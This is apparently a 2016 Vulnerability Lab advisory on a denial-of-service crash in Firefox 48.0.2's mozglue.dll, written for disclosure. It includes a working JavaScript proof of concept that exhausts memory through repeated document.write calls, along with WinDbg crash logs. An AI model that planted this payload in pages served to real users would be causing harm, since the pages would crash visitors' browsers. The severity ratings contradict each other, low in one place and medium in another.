Mozilla Firefox v48.0.2 - (mozglue.dll) Denial of Service

Document Title:
===============
Mozilla Firefox v48.0.2 - (mozglue.dll) Denial of Service


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1953


Release Date:
=============
2016-10-04


Vulnerability Laboratory ID (VL-ID):
====================================
1953


Common Vulnerability Scoring System:
====================================
3


Vulnerability Class:
====================
Denial of Service


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Mozilla Firefox is a web browser open and free, developed and distributed by the Mozilla Foundation with 
the help of thousands of volunteers with the methods of development of free software / open source and 
freedom of source code.
 
(Copy of the Homepage: https://www.mozilla.org/fr/firefox/new/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a denial of service vulnerability in the official Mozilla Firefox Browser v48.0.2.


Vulnerability Disclosure Timeline:
==================================
2016-10-04: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mozilla
Product: Firefox - Browser (Software) 48.0.2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure Program


Technical Details & Description:
================================
A denial of service vulnerability has been discovered in the official Mozilla Firefox Browser v48.0.2.
The issue can crash the local software process (mozglue.dll) via denial of service vulnerability.


Proof of Concept (PoC):
=======================
The browser web vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation (Javascript)
<body onload="javascript:VulnerabilityLab();"></body> 
<script>
function VulnerabilityLab() {
var buffer = 'x41';
for (i =0;i<1337;i++) {
buffer+=buffer+'x41';
document.write('<html><marque><h1>'+buffer+buffer);
} 
}
</script> 


--- PoC Debug Session Logs [WinDBG] ---
Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesMozilla Firefoxmozglue.dll - 
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
6e82efe6 6a03            push    3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50              push    eax
6e82eff9 ff155c60836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc              int     3
mozglue!mozalloc_handle_oom:
6e82f000 55              push    ebp
lmvm mozglue
start    end        module name
6e820000 6e83d000   mozglue    (export symbols)       C:Program FilesMozilla Firefoxmozglue.dll
    Loaded symbol image file: C:Program FilesMozilla Firefoxmozglue.dll
    Image path: C:Program FilesMozilla Firefoxmozglue.dll
    Image name: mozglue.dll
    Timestamp:        Wed Aug 24 06:53:43 2016 (57BD2857)
    CheckSum:         0001E87D
    ImageSize:        0001D000
    File version:     48.0.2.6079
    Product version:  48.0.2.6079
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: mozglue.dll
    ProductVersion:   48.0.2
    FileVersion:      48.0.2
    FileDescription:  48.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla


Security Risk:
==============
The security risk of the denial of service vulnerability in the firefox web-browser is estimated as medium (CVSS 3.0).


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™